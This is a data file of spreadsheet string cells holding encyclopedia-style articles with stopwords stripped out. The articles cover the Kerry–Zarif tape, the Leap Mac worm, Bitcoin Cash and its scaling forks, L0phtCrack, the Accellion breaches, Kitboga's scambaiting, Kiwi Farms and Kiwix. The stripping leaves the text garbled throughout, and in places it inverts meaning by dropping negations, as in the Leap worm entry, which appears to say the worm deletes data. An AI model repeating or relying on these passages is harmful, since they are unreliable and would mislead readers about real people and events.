united states department state price stated confirm accuracy authenticity audiotape claims, implied kerry would likely disclosing confidential information israel publicly revealed struck iranian forces syria 2017 2018. republicans starting april 2021, republicans suggested kerry resign biden administration's national security council highly critical kerry's alleged disclosures. sen. sullivan said “people talking treason don’t throw word around lot...john kerry kinds things can’t stand. broke camel’s back.” rep. zeldin called alleged comments kerry “massively alarming" proven kerry actively undermined america's staunchest allies, needs resign biden administration immediately security clearance revoked". sen. roger marshall said, "john kerry forced administration immediately least removed entirely national security briefings decisions". sen. cruz "this tape verified, would signal catastrophic disqualifying recklessness envoy kerry foreign minister zarif endangered safety americans allies". former united nations ambassador nikki haley tweeted kerry's disclosure "stabbing" israel back. rep. mike gallagher said, "it’s unfathomable u.s. diplomat, past present, would leak intelligence world’s leading sponsors terrorism expense staunchest allies". former secretary state trump administration, mike pompeo said, "when briefing trump, kerry briefing zarif". four-star general jack keane said still allegations, surprised, stating zarif kerry "close relationship" continued kerry left office. said, "completely irresponsible downright reckless, certain degree quite unprecedented terms history."other republicans expressed uncertainty tape's veracity. sen. lindsey graham said, don’t know trust tape not. it’s true, it’s damaging...i like john kerry, would helpful would problematic true. let’s wait authentic is.” rep. michael mccaul said, need open investigation. facts need come out. know they're true not, are, consequences. this appears somewhat treasonous meeting enemy cutting back deals sharing information, intelligence related israel efforts iran proxies syria. having said that, know facts. rest assured, find out." sen. mitt romney said, “it’s troubling, needs full transparency understand exactly done, whom, purpose, accounting occurred...we recording iranian official, something evaluated looked into.” media news published story although intense backlash york times published story kerry, also "widespread blackout media coverage", abc, cbs, nbc, msnbc making mentions "controversy". national review wrote: "was deliberate obama administration decision tell iranians, kerry freelancing? either way, seems extraordinarily unlikely israelis signed kerry revealing information tehran." washington post columnist, marc thiessen, wrote: "four years ago, senate democrats demanded investigation trump’s alleged disclosures russia. kerry stands accused, silence democrats deafening. iranian foreign minister said learned intelligence information kerry. that cannot simply ignored. democrats responsibility conduct oversight biden national security team. kerry called capitol hill explain oath said zarif said it." zarif's comments qasem soleimani tape, zarif spoke relationship qasem soleimani, killed united states drone strike 2020. zarif said assassinating [soleimani] iraq, united states delivered major blow iran, damaging wiped entire city attack". reactions 2021, instagram post, zarif apologized remarks made soleimani, writing: "some tried unfortunate situation means disrupt empathy brave people region tool short-term political goals...i emphasize words undermine single greatness martyr general soleimani irreplaceable role restoring security iran, region world...if known sentence words would made public, certainly would uttered past." 2021, televised speech, iran's supreme leader, ayatollah khamenei, said zarif comments "big mistake must perpetrated officials islamic republic". former secretary state, mike pompeo, tweeted, "our administration’s exquisite strike qasem soleimani massive impact iran middle east. don’t take word ⁦⁦@jzarif. president biden still thinks mistake." letter zarif, several iranian "martyrs" families criticized insulting soleimani. they wrote zarif blamed iranians "failure" negotiations. references</t>
  </si>
  <si>
    <t>Leap (computer worm)</t>
  </si>
  <si>
    <t>oompa-loompa malware, also called osx/oomp-a leap.a, application-infecting, lan-spreading worm discovered apple security firm intego february 2006. leap cannot spread internet, spread local area network reachable using bonjour protocol. networks limits single subnet. delivery infection leap worm delivered ichat instant messaging program gzip-compressed file called latestpics.tgz. worm take effect, user must manually invoke opening file running disguised executable within. executable disguised standard icon image file, claims show preview apple's next once run, worm attempt infect system. non-"admin" users, prompt computer's administrator password order gain privilege edit system configuration. infect applications disk, rather loaded, using system facility called "apphook". leap infects cocoa applications, infect applications owned system (including apps come pre-installed machine), apps owned user currently logged typically, means apps current user installed drag-and-drop, rather apple's installer system. when infected launched, leap tries infect four recently used applications. four meet criteria, infection takes place time. payload once activated, leap attempts spread user's ichat bonjour buddy list. spread using main ichat buddy list, xmpp. default, ichat bonjour thus cannot transmit worm.) leap delete data, system, take control harmful effect: worm itself, infected application launch. this helpful prevents people continuing launch infected program. protection recovery common method protecting type computer worm avoiding launching files untrusted sources. existing admin account "declawed" unchecking "allow user administer computer." least admin account must remain system order install software change vital system settings, even account created solely purpose.) recovering leap infection involves deleting worm files replacing infected applications fresh copies. require re-installing since system-owned applications immune. references external links intego analysis osx/leap.a osx/oompa-loompa macworld- security: antivirus macworld test leap recovery tips leap-a malware: need know</t>
  </si>
  <si>
    <t>Bitcoin Core</t>
  </si>
  <si>
    <t>Bitcoin Cash</t>
  </si>
  <si>
    <t>bitcoin cash cryptocurrency fork bitcoin. bitcoin cash spin-off altcoin created 2017.in november 2018, bitcoin cash split cryptocurrencies: bitcoin cash bitcoin history since inception, bitcoin users maintained common rules cryptocurrency. july 2017, bitcoin miners locked-in software upgrade referred bitcoin improvement proposal (bip) meant segregated witness upgrade would activate block 477,120. segwit controversially would enable second layer solutions bitcoin lightning network. difference opinion bitcoin users running nodes. bitcoin supporters wanted keep blocks small nodes could operated less resources, large block supporters find acceptable (due large block sizes), nodes might universities, private companies nonprofits.a group bitcoin activists, developers, china-based miners unhappy bitcoin's proposed segwit improvement plans meant increase bitcoin's capacity; stakeholders pushed forward alternative plans would increase block size limit eight megabytes hard fork. supporters block size increase committed on-chain medium exchange function.in june 2017, hardware manufacturer bitmain, described would-be hard fork increased block size "contingency plan", bitcoin community decide fork implementing segwit. first implementation software proposed name bitcoin conference month. july 2017, mining pool viabtc proposed name bitcoin cash. july 2017 roger others stated felt adopting (that would later activate segwit) favored people wanted treat bitcoin digital investment rather transactional currency. fork created bitcoin cash took effect august 2017. relation bitcoin characterized variously spin-off, strand, product hard fork, offshoot, clone, second version altcoin. hong kong newspaper likened version word processing software saying: bitcoin cash like version microsoft word, generates documents longer opened older versions. time fork anyone owning bitcoin came possession number bitcoin cash units. technical difference bitcoin cash bitcoin bitcoin cash allows larger blocks blockchain bitcoin which, theory, allows process transactions second. bitcoin cash first bitcoin forks, software-development teams modified original bitcoin computer code released coins “bitcoin" names, "the goal creating money thin air". august 2017 bitcoin cash began trading $240, bitcoin traded $2,700. december 2017 reached intraday high $4,355.62 fell $519.12 august 2018.in 2018 bitcoin core developer cory fields found bitcoin software would allowed attacker create block causing chain split. fields notified development team fixed.in november 2020, second contested hard fork leading node implementation, bitcoinabc, created bcha. controversy 2017 factions bitcoin supporters: supported large blocks preferred small blocks. bitcoin cash faction favors currency medium exchange commerce, bitcoin-supporting faction view bitcoin's primary store value. bitcoin cash sometimes also referred bcash. bitcoin cash detractors call cryptocurrency "bcash", "btrash", scam", supporters maintain pure form bitcoin".bryan kelly, stock analyst likened software upgrade: bitcoin cash “hard fork” “effectively software upgrade”, kelly said “fast money”. “when software upgrade, everybody usually agrees. particular case, everybody agreeing.” samson blockstream pointed bitcoin cash's "bitcoin" name source animosity bitcoin bitcoin cash camps. emin sirer, professor cornell stated bitcoin cash focused bitcoin "enormously" focused store value. trading usage bitcoin cash trades digital currency exchanges using bitcoin cash name currency code cryptocurrency. march 2018, okex removed bitcoin cash trading pairs except bch/btc, bch/eth bch/usdt "inadequate liquidity". 2018, daily transaction numbers bitcoin cash one-tenth bitcoin. coinbase listed bitcoin cash december 2017 coinbase platform experienced price abnormalities insider trading investigation. august 2018, bitcoin cash payments supported payment service providers bitpay, coinify gocoin. difficulty adjustment algorithm both bitcoin, well bitcoin cash, proof-of-work algorithm timestamp every block. proof work algorithm used cases. described partial inversion hash function. additionally, bitcoin bitcoin cash target block generated every minutes average. time needed calculate block influenced parameter called mining difficulty. total amount mining power increases, increase mining difficulty keep block time roughly constant. vice versa, mining power decreases, decrease mining difficulty keep block time roughly constant.to keep block generation time equal minutes average, bitcoin bitcoin cash algorithm adjusting mining difficulty parameter. this algorithm called difficulty adjustment algorithm (daa). originally, bitcoin bitcoin cash used difficulty adjustment algorithm, adjusting mining difficulty parameter every 2016 blocks. since august 2017, bitcoin cash also used addition daa, called emergency difficulty adjustment (eda) algorithm. used alongside original designed decrease mining difficulty bitcoin cash 20%, time difference successive blocks greater hours.eda adjustments caused instabilities mining difficulty bitcoin cash system, resulting bitcoin cash thousands blocks ahead bitcoin. address problem stability, change bitcoin cash implemented canceled. change took effect november 2017. after change, bitcoin cash adjusts mining difficulty block. calculate difficulty block, bitcoin cash uses moving window last blocks.a group researchers demonstrated that, june 2019, bitcoin fails generate blocks constant rate long hash supply elastic. contrast that, group demonstrated bitcoin cash stable even cryptocurrency price volatile supply hash power highly elastic. 2018 split create bitcoin november 2018, hard fork chain split bitcoin cash occurred rival factions called bitcoin cash bitcoin november 2018 bitcoin cash traded $289, bitcoin traded $96.50, $425.01 november un-split bitcoin cash.the split originated described "civil war" competing bitcoin cash camps. first camp, supported entrepreneur roger jihan bitmain, promoted software entitled bitcoin (short adjustable blocksize cap), would maintain block size second camp craig steven wright billionaire calvin ayre forth competing software version bitcoin short "bitcoin satoshi vision", would increase block size limit mb.the bitcoin blockchain largest bitcoin forks, exceeding terabytes size. also bitcoin scalability problem list bitcoin forks list cryptocurrencies notes references external links official website</t>
  </si>
  <si>
    <t>Legion Hacktivist Group</t>
  </si>
  <si>
    <t>legion hacktivist group attacked rich powerful people india hacking twitter handlers. group claims access many email servers india encryption keys used indian banks internet. history india attacks (2019) legion came news launched series attacks starting rahul gandhi, member indian national congress.reports rahul's twitter handler hacked mail server also hacked. next day, inc's twitter handler also hacked tweeted irrelevant content. group hacked twitter handlers vijay mallya, barkha dutt ravish kumar. hacking russian government (2021). because russian government tried censor telegram 2018-2020, legion hacker group hacked sub-domain belonging federal antimonopoly service. they cause harm, posted message russian government stating "the vandalism destruction roskomnadzor caused internet privacy russian anonymity made target legion." this text document removed 16hours still available wayback machine. references</t>
  </si>
  <si>
    <t>L0phtCrack</t>
  </si>
  <si>
    <t>l0phtcrack password auditing recovery application originally produced mudge l0pht heavy industries. used test password strength sometimes recover lost microsoft windows passwords, using dictionary, brute-force, hybrid attacks, rainbow tables.the initial version released spring 1997.the application produced @stake l0pht merged @stake 2000. @stake acquired symantec 2004. symantec later stopped selling tool customers, citing government export regulations, discontinued support december 2006.in january 2009, l0phtcrack acquired original authors zatko, wysopal, rioux symantec. l0phtcrack announced march 2009 source boston conference. l0phtcrack contains support 64-bit windows platforms well upgraded rainbow tables support. l0phtcrack released august 2016, seven years previous release. l0phtcrack supports cracking, increasing performance times previous versions.on april 2020 terahash announced acquired l0phtcrack. details sale released. july 2021 l0pht holdings, repossessed l0phtcrack terahash defaulted installment sale loan. current owners announced exploring open sources options l0phtcrack. commercial libraries existing within software take time.on october 2021 l0phtcrack version 7.2.0 released open-source, different portions software published different licenses. references external links l0phtcrack website l0phtcrack repositories gitlab</t>
  </si>
  <si>
    <t>Kingsoft</t>
  </si>
  <si>
    <t>kingsoft corporation (chinese: 金山软件; pinyin: jīnshān ruǎnjiàn) chinese software company based beijing. kingsoft operates four subsidiaries: seasun video game development, cheetah mobile mobile internet apps, kingsoft cloud cloud storage platforms, office software, including office. also produced security software known kingsoft security. popular game developed kingsoft online launched 2009.kingsoft owns data centers mainland china, hong kong, russia, southeast asia, north america.the company founded 1988 bojun. reached prime 2008–2010. 2011, bojun sold 15.68% stake kingsoft tencent.kingsoft listed hong kong stock exchange. references external links official website chinese)</t>
  </si>
  <si>
    <t>Bitcoin Unlimited</t>
  </si>
  <si>
    <t>bitcoin unlimited (bu) full node implementation bitcoin bitcoin cash networks. bitcoin core client, bitcoin unlimited forked, hard coded megabyte block limit; bitcoin unlimited differs allowing users signal block size limit prefer, find limit majority consensus automatically track largest proof-of-work, regardless block size. however, block greater megabyte size accepted bitcoin unlimited rejected nodes block size limit, fork network occur, resulting separate blockchains bitcoin unlimited nodes following chain largest proof-of-work.the release bitcoin unlimited follows release bitcoin bitcoin classic, alternative proposals aimed increase bitcoin's transaction capacity around 2.5-3 transactions second increasing hard-coded block size limit.as version 1.1.0.0, bitcoin unlimited releases compatible bitcoin cash, cryptocurrency split bitcoin allows larger blocks. scalability bitcoin unlimited attempt upgrade bitcoin core client processes bitcoin transactions blocks potential maximum size greater core's hard-coded limit megabyte. megabyte block size limit added 2010 satoshi nakamoto temporary anti-dos measure. this limited maximum network capacity three transactions second. advocates change, block size increase needed order avoid workflow bottleneck number transactions made bitcoin adoption increases. with bitcoin unlimited, miners independently able configure size blocks validate.miners using bitcoin unlimited continue process regular-sized blocks soon block larger megabyte mined, follow chain containing work.per bitcoin unlimited website, scalability solution found focal point. support bitcoin unlimited follows release bitcoin bitcoin classic, alternative proposals increase bitcoin's transaction capacity. mining pools including antpool. opposition developers bitcoin core reluctant increase block size limit. nodes attacked developers brought light march 2017. numbers nodes hosting unlimited fell following attacks, lowest level since october, returned within hours according website coin.dance tracks network data.as july 2022, three nodes online according coin dance data, decrease seven 2021. also list bitcoin forks notes references external links bitcoin unlimited</t>
  </si>
  <si>
    <t>Kuki AI</t>
  </si>
  <si>
    <t>kuki embodied designed befriend humans metaverse. formerly known mitsuku, kuki chatbot created pandorabots aiml technology steve worswick. five-time winner turing test competition called loebner prize 2013, 2016, 2017, 2018, 2019), holds world record. kuki available chat online portal, facebook messenger, twitch group chat, telegram, messenger, discord, available skype, removed developer. also accounts instagram, tiktok, youtube, twitter, well game roblox. features kuki claims 18-year-old female chatbot metaverse. contains alice's aiml files, many additions user generated conversations, always work progress. worswick claims worked since 2005. early work company's co-founders inspired spike jonze movie her.her intelligence includes ability reason specific objects. example, someone asks "can house?", kuki looks properties "house". finds value "made_from" "brick" replies "no", house eatable. play games magic tricks user's request. 2015 conversed, average, excess quarter million times daily.according 2020 feature, "every week, mitsuku exchanges millions messages users, regulars, others curious. since 2016, landed major messaging platforms, estimated million unique users hailing corners world chatted her." wall street journal article titled “advertising’s frontier: talk bot,” technology reporter christopher mims made case “chatvertising” piece mitsuku messenger:if seems improbable many teens—80% kik's users 22—would want talk robot, consider creator award-winning, web-accessible chat named mitsuku told interviewer 2013. "what keeps going emails comments chat-logs people telling mitsuku helped situation whether dating advice, bullied school, coping illness even advice interviews. also many elderly people talk companionship." advertiser bolt upright reading understand dark manipulation craft depends.mitsuku featured number news outlets. fast company described mitsuku “quite impressive” declared victor siri chatbot smackdown. blog post guardian loneliness explored role chatbots like mitsuku microsoft’s xiaoice play companions, rather mere assistants, peoples' emotional lives.pandorabots makes version mitsuku chatbot available service api. virtual talent, model, influencer kuki appeared virtual model vogue business crypto fashion week modelled nfts spoke future digital fashion. also headlined speaker providing live interview influencer" vidcon asia: virtual gathering internet personalities around world." 2021, kuki modelled five digital looks emerging vogue talents designers italian vogue, sold nfts hour. awards 2019, kuki awarded loebner prize five times, entrant. prize awarded artificial intelligence computer program deemed humanlike, determined judging panel 2019, changed audience participation vote. kuki also declared victor 24/7 verbal sparring match called "bot battle" facebook ai's blenderbot, winning audience vote. references external links official website</t>
  </si>
  <si>
    <t>Bitcoin scalability problem</t>
  </si>
  <si>
    <t>bitcoin scalability problem refers limited capability bitcoin network handle large amounts transaction data platform short span time. related fact records (known blocks) bitcoin blockchain limited size frequency.bitcoin's blocks contain transactions bitcoin network.: on-chain transaction processing capacity bitcoin network limited average block creation time minutes original block size limit megabyte. these jointly constrain network's throughput. transaction processing capacity maximum estimated using average median transaction size transactions second. there various proposed activated solutions address issue. background block size limit, concert proof-of-work difficulty adjustment settings bitcoin's consensus protocol, constitutes bottleneck bitcoin's transaction processing capacity. this result increasing transaction fees delayed processing transactions cannot block. various proposals come forth scale bitcoin, contentious debate resulted. business insider 2017 characterized debate "ideological battle bitcoin's future." forks increasing network's transaction processing limit requires making changes technical workings bitcoin, process known fork. forks grouped types: hard fork hard fork rule change software validating according rules blocks produced according rules invalid. case hard fork, nodes meant work accordance rules need upgrade software. group nodes continues software nodes software, permanent split occur. example, ethereum hard-forked 2016 "make whole" investors dao, hacked exploiting vulnerability code. case, fork resulted split creating ethereum ethereum classic chains. 2014 community asked consider hard fork would rollback blockchain records mitigate effects theft million major cryptocurrency exchange. hard fork proposal rejected, funds recovered negotiations ransom payment. alternatively, prevent permanent split, majority nodes using software return rules, case bitcoin split march 2013.a recent hard-fork example bitcoin 2017, resulted split creating bitcoin cash. network split mainly disagreement increase transactions second accommodate demand.bitcoin cash ("bch") hard fork bitcoin increasing maximum block size. bitcoin bitcoin classic bitcoin unlimited supported increase maximum block size. august 2017, forked, blockchain split separate blockchains: maintained accordance rules currently valid bitcoin, maintained accordance rules currently valid bitcoin cash. coins bitcoin chain prior fork moved them, could move chains. thus, holders bitcoin also became holders bitcoin cash time split. henceforth bitcoin bitcoin cash separate trade entirely independent valuations relative other, fiat currencies, assets. bitcoin ("bsv") hard fork bitcoin cash offers competing implementation bitcoin protocol aims solve bitcoin scalability problem implementing unbounded block size, enabling network produce blocks unlimited size. soft fork soft fork soft-forking change described fork blockchain occur network nodes follow rule followed newly upgraded nodes.: glossary this could cause nodes accept data appear invalid nodes, become sync without user noticing. this contrasts hard-fork, node stop processing blocks following changed rules instead. segregated witness example soft fork. case soft fork, mining nodes meant work accordance rules need upgrade software. efficiency improvements technical optimizations decrease amount computing resources required receive, process record bitcoin transactions, allowing increased throughput without placing extra demand bitcoin network. these modifications either network, case fork required, individual node software (such bitcoin core). schnorr signatures proposed scaling solution long-time developer blockstream co-founder pieter wuille. merkelized abstract syntax trees (mast) proposal johnson reduces size smart contracts (complex scripts), increases privacy. 2006 paper mihir bellare enables signature aggregation o(1) size, means take space multiple signers. bellare-neven reduces schnorr single key. bellare-neven implemented. "layer systems lightning network (ln) protocol aims improve bitcoin's scalability speed without sacrificing trustless operation. lightning network requires putting funding transaction blockchain open payment channel. once channel opened, connected participants able make rapid payments within channel route payments "hopping" channels intermediate nodes little fee. january 2018 blockstream launched payment processing system retailers called "lightning charge", noted lightning live mainnet nodes operating january 2018 advised still considered testing". march 2018, lightning labs released beta version lightning network implementation bitcoin mainnet, march 2018, acinq released mainnet beta eclair implementation desktop application. january 2019 online retailer bitrefill announced receives payments bitcoin lightning network cryptocurrency accept. june 2021, legislative assembly salvador voted legislation make bitcoin legal tender salvador. decision based success bitcoin beach ecosystem zonte used based wallet. government introducing wallet utilising lightning network protocol giving freedom citizens bitcoin lightning wallets. block size increases bitcoin's transaction throughput limited parameters: block time determines often block added chain, block size determines amount data added every block.bitcoin block time minutes block size 1mb. various increases limit, proposals remove completely, proposed bitcoin's history. litecoin produces blocks four times faster bitcoin leads improvement throughput. dogecoin even throughput block time minute. bitcoin cash block size hence throughput bitcoin. bitcoin removed block size limit altogether. proposed 2015, bip100 jeff garzik bip101 gavin andresen introduced. bitcoin proposed 2015 increase transaction processing capacity bitcoin increasing block size limit. bitcoin classic proposed 2016 increase transaction processing capacity bitcoin increasing block size limit. "the hong kong agreement" 2016 agreement miners developers contained timetable would activation segregated witness (segwit) proposal established december 2015 bitcoin core developers, development block size limit increased however, timelines missed. segwit2x proposed hard fork cryptocurrency bitcoin. implementation segregated witness august 2017 first half so-called "new york agreement" wanted increase effective block size segwit compromised wanted increase block size hard fork larger block size. second half segwit2x involved hard fork november 2017 increase blocksize megabytes. november 2017 developers segwit2x announced hard fork planned around november 2017 canceled time lack consensus. bitcoin unlimited advocated miner flexibility increase block size limit supported mining pools viabtc, antpool investor roger ver.bitcoin unlimited's proposal different bitcoin core block size parameter hard-coded, rather nodes miners flag support size want, using idea refer 'emergent consensus'. those behind bitcoin unlimited proposal argue ideological standpoint miners decide scaling solution since ones whose hardware secure network. also software development list bitcoin forks references</t>
  </si>
  <si>
    <t>Kitboga (streamer)</t>
  </si>
  <si>
    <t>kitboga internet alias american twitch streamer youtuber whose content primarily focuses scam baiting scams conducted phone. channel million followers twitch, youtube channel million subscribers. career scambaiting mid-2017, kitboga found grandmother fallen victim many scams designed prey elderly, online person. discovered "lenny", loop vague pre-recorded messages scam baiters play calls convincing scammer real person phone without providing useful information scammer. after seeing videos uploaded youtube, decided replicate calls himself. while started streaming friends twitch, viewership soon started growing beyond immediate circles, eventually leading growth popularity experienced since starting channel. kitboga hopes wasting scammers' time, prevent scamming others, also providing source entertainment education viewers.in march 2020, growing prevalence covid-19 pandemic, kitboga started baiting scammers selling essential dishonestly claimed cure covid-19, following warning united states federal trade commission consumers alert coronavirus-related scams.in november 2020, kitboga signed represent worldwide, goal expanding reach kitboga's anti-scam message.may 2022, kitboga signed ryan morrison's evolved talent agency, goal expanding kitboga's anti-scam message. technique videos, kitboga engages scam baiting several types scammers. besides technical support scammers, also engages refund scammers, scammers, social security scammers, others. mixes elements popular culture dialogue wordplay calls; example, march 2020 call scammer falsely claiming sell covid-19 cure, kitboga implied scammer called "saint anne", eliding words sound like "satan".to misdirect scammers away real identity, well viewer entertainment, kitboga often poses number different characters videos, including grandmother named either edna, vera, matilda, bernice anders play name bernie sanders), russian named vicktor viktoor, valley girl named nevaeh ("heaven" spelled backwards), sometimes even competing technical support scammer named daniel. imitating accent vocal intonation character trying portray, often additionally using voice changer alter pitch voice. common factor uniting kitboga's characters computer-savvy, giving scammer confidence scam likely succeed.the scams kitboga engages scambaiting often require victim install remote desktop software. example, case technical support scams, scammers request access victim's computer "diagnose" technical issue (where none really exists), request payment "fix". because risks involved remotely connecting unknown computer, kitboga uses different computer scambaiting; computer runs virtual machine equipped virtual private network. this ensures malware software installed scammer affect computer, also hides true address location scammers. however, scammers sometimes discern potential victim using virtual machine, kitboga team "have spent countless hours 'spoofing' [their] virtual machine look feel like well-used, average computer."types phone scams technical support scam also often involve scammer giving reason connect victim's computer. online refund scams, example, scammer requests connect victim's computer access online banking website. when kitboga interacts scammers, addition taking aforementioned precautions, also uses fake online banking website created specifically type scambaiting. this website contains intentional features easter eggs make difficult scammer conduct scam, scammer wastes additional time entertainment kitboga's audience.when baiting scammers types scammers request payments gift card, kitboga uses piece computer code make gift card redemption page accept gift code follows specified format. then, scammer asks read gift codes redeem take payment victim, types computer claims himself, pretending know better.at bait calls, kitboga sometimes turns voice changer reveals aware call attempted scam entire time. some scammers immediately hang kitboga reveals ruse them. others' reactions range anger regret, maintaining legitimate tech support agents. still others unrepentantly dismissive kitboga's hoax, informing plenty impending victims await hold. other work kitboga active promoting computer science education. regularly holds computer programming streams maintains tools uses scambaiting calls. addition, kitboga partnered stem organization first 2018 stream building real-life "meme-o-meter" like found scambaiting streams; stream, interacted children interested stem stream chat. stated 2021 looking building scambaiting program.before starting twitch youtube channels, kitboga worked software engineering. particularly starting build channel, used technical background knowledge virtual machines protect scambaiting. said people become aware scams tries bait, decreasing prevalence, would consider returning software engineering changing focus stream coding playing video games.in 2021, kitboga teamed g4tv create animated series audio drawn daily twitch scambaiting streams. awards nominations also browning: online alias anonymous british youtube personality whose specialty scambaiting references external links official website</t>
  </si>
  <si>
    <t>Kiteworks</t>
  </si>
  <si>
    <t>kiteworks, formerly known accellion, inc., american technology company secures sensitive content communications channels email, file share, file transfer, managed file transfer, forms, application programming interfaces. company founded 1999 singapore based palo alto, california. 2022, company stated products used 3,800 organizations worldwide. beginning late 2020, zero-day exploit legacy product data breaches dozens government private organizations, multiple countries. code vulnerabilities confirmed company's legacy file transfer appliance (fta) product present kiteworks platform built separate codebase. history company founded accellion singapore 1999 originally focused distributed file storage. company moved palo alto, california shifted focus secure file transmission. accellion reached total funding million 2011, valued $500 million 2014. company's chief executive officer, yorgen edholm, credited aversion "national security agency–style snooping" factor success.in january 2012, accellion raised $12.2 million funding riverwood capital continue expansion.in 2016, accellion started focus security compliance released features included data security, governance, compliance. they also began integrations major cybersecurity independent software vendors (isvs).in april 2020, company received $120 million investment bregal sagemount.in october 2020, accellion rebranded kiteworks.in january 2022, kiteworks acquired totemo, email encryption gateway provider based zurich, switzerland.kiteworks used million users, across 3,800 organizations. software accellion working file transfer systems late 2002. company released file transfer appliance 2005, physical machine aiming reduce server load sending large files.in march 2011, company released online file collaboration product, emphasizing security.in 2012, company launched service allowing file sharing mobile devices. included synchronization feature called kitedrive. early demand company's file transfer applications came organizations needed transfer large files, including healthcare companies universities.in january 2014, accellion launched kiteworks, file sharing product allowing users edit files projects remotely, interoperability services like google drive dropbox. that december, company released programming interfaces extending secure file access mobile devices.in 2015, pcmag reviewer, fahmida rashid, praised kiteworks interface, support mobile devices, privacy tools.in june 2017, accellion received fedramp authorization moderate controlled unclassified information (cui).in november 2018, accellion launched ciso dashboard. 2020–21 security breaches mid-december 2020, company's file transfer appliance product—now 20-year-old legacy system—was subject zero-day exploit, patched december three additional vulnerabilities discovered patched next month. first vulnerability injection, allowing attacker shell arbitrary commands extract data. four vulnerabilities assigned common vulnerabilities exposures (cve) codes 2021-27101 2021-27104 february 2021.out approximately total clients, appeared suffered significant data theft including kroger, shell company, university california system, australian securities investments commission, reserve bank zealand, singtel. data stolen includes social security numbers identification numbers, images passports, financial information, driver's licence data, emails. according computer security firm fireeye, attackers comprised hacking groups: ties "clop", ransomware group, connected financial crime group "fin11". many victims received extortion emails containing .onion link website containing data dumps multiple organizations. prior attacks, accellion maintained legacy product nearing life, support ending april 2021, asking customers move kiteworks system. david kennedy, corporate incident response firm trustedsec, said "[t]he accellion zero days particularly damaging actors mass-exploiting vulnerability quickly, severity communicated accellion". mathew schwartz summarized exploits "among many lessons learned mess this: attackers devote substantial resources reverse-engineer hardware, software service financial upside."in january 2022, accellion proposed would $8.1m settlement relation breaches. proposed settlement settle legal actions accellion only. they take account legal actions clients impacted data breach. references external links official website</t>
  </si>
  <si>
    <t>Kiwi Farms</t>
  </si>
  <si>
    <t>kiwi farms, formerly known cwcki forums american internet forum dedicated discussion online figures communities deems "lolcows" (people "milked laughs"). targets threads often subject doxing forms organized group trolling, harassment, stalking, including real-life harassment users. harassment stemming kiwi farms implicated suicides three people targeted users site. history website originally launched forum website troll harass webcomic artist first noticed 2007 4chan video game board.: eventually, encyclopedia dramatica page created artist. dedicated wiki, titled "cwcki" based artist's initials, created people felt encyclopedia dramatica entry detailed accurate enough. kiwi farms originally called "cwcki forums".following june 2021 suicide near, software developer target harassment kiwi farms users, dreamhost gave site owner notice would longer provide domain registration services. kiwi farms subsequently began using russian registrar. shortly thereafter, moved american-based domain registrar. controversies suicides harassment targets harassment campaigns kiwi farms users known contributed suicides three individuals. kiwi farms community considers goal drive targets suicide, celebrated deaths counter website.: they used social media reporting systems mass-report posts harassment targets they've expressed suicidal thoughts intentions, goal reducing possibility targets receive help.: 2013, american video game developer chloe sagal became kiwi farms target eurogamer reported sagal's indiegogo crowdfunding campaign flagged "suspicious activity". sagal raised $30,000 platform metal poisoning treatment remove shrapnel accident, eurogamer reported sagal actually intended proceeds reassignment surgery. sagal later died self-immolation june 2018, several reports attributed years harassment kiwi farms.julie terryberry, canadian woman, died suicide 2016 following sustained harassment kiwi farms users.in twitter thread posted june 2021, near, pseudonymous japan-based software developer, described lifelong bullying harassment kiwi farms users. near said kiwi farms "made harassment orders magnitude worse". near stated friends doxed goaded suicide members website, near mocked autistic. june hector martin posted link google document said came mutual friend near's, said near died suicide, alleged harassment kiwi farms amounted murder. martin subsequently reported june spoken police confirmed near died previous day. today also reported july 2021, confirmed near's former employer died. near previously known pseudonym "byuu" notable creator snes emulator higan, well detailed translation snes game bahamut lagoon, worked 1997 release february 2021. christchurch mosque shootings march 2019, kiwi farms republished livestream manifesto brenton tarrant, perpetrator 2019 christchurch mosque shootings. shortly after, website owner joshua moon publicly denied request zealand police voluntarily hand data posts relating shooting, including email addresses posters. moon responded aggressively mockingly, calling zealand "shithole country", stated "give single solitary fuck section faggot says sharing email". deemed request censorship attempt argued zealand authorities legal reach imprison everyone who's posted [the video]". kiwi farms several websites blocked zealand internet service providers attack. zealand, caught possessing sharing images videos attack faced charges could result 14-year prison sentences. immortal fiction authorship 2017, tumblr user young adult fiction writer rose christo claimed authored harry potter fiction immortal", which, christo said, written order find missing brother. announced macmillan publishers publishing memoir, under same stars: search brother true story immortal, fiction's creation well childhood abuse experiences native american york foster care system. forum thread concerning christo discussing claims created kiwi farms. christo's brother, kiwi farms user, responded thread christo's story nearly entirely false. claims took issue included native american ancestry, gone foster care, quest locate him, formed center memoir. christo admitted falsified documents supporting story, maintained written immortal. macmillan publishers cancelled publication memoir. also 8chan references</t>
  </si>
  <si>
    <t>Kiwix</t>
  </si>
  <si>
    <t>kiwix free open-source offline browser created emmanuel engelhart renaud gaudin 2007. first launched allow offline access wikipedia, since expanded include projects wikimedia foundation, well public domain texts project gutenberg. available languages, kiwix included several high-profile projects, smuggling operations north korea encyclopedic access cuba google impact challenge's recipient bibliothèques sans frontières. history founder emmanuel engelhart sees wikipedia common good, saying "the contents wikipedia available everyone! even without internet access. this launched kiwix project."after becoming wikipedia editor 2004, engelhart became interested developing offline versions wikipedia. project make wikipedia initiated 2003, trigger project.in 2012, kiwix received grant wikimedia france build kiwix-plug, deployed universities eleven countries known afripedia project. february 2013 kiwix sourceforge's project month award open source award 2015. description software designed offline reader content. used computers without internet connection, computers slow expensive connection, avoid censorship. also used travelling (e.g. plane train). users first download kiwix, download content offline viewing kiwix. compression saves disk space bandwidth. english-language wikipedia, pictures, fits large stick external media december 2021, pictures).all content files compressed format, makes smaller, leaves easy index, search, selectively decompress. files opened kiwix, looks behaves like browser. kiwix offers full text search, tabbed navigation, option export articles html.there http server version called kiwix-serve; allows computer host kiwix content, make available computers network. computers ordinary website. kiwix-hotspot http server version plug computers, often used provide wi-fi server. available content list content available kiwix available download, including language-specific sublists. content loaded kiwix itself. since 2014, wikipedia versions available download various different languages. english wikipedia, full version containing pictures well alternative version containing text downloaded archive. servers updated every months, depending size file. english wikipedia, update frequency thus substantially lower bzip2 database downloads wikimedia foundation, updated twice month.besides wikipedia, content wikimedia foundation wikisource, wikiquote, wikivoyage, wikibooks, wikiversity also available offline viewing various different languages.in november 2014, version open texts forming part project gutenberg made available.besides public domain content, works licensed creative commons license available download well. example, offline versions ubuntu wiki containing user documentation ubuntu operating system, editions conference talks videos crash course available kiwix archive file formats. historic wikipedia articles selection releases between 2007 2011, three cd/dvd versions containing selection articles english wikipedia released. they available kiwix files: wikipedia version wikipedia version wikipedia version deployments kiwix installed desktop computer stand-alone program, installed tablet smartphone, create wlan environment 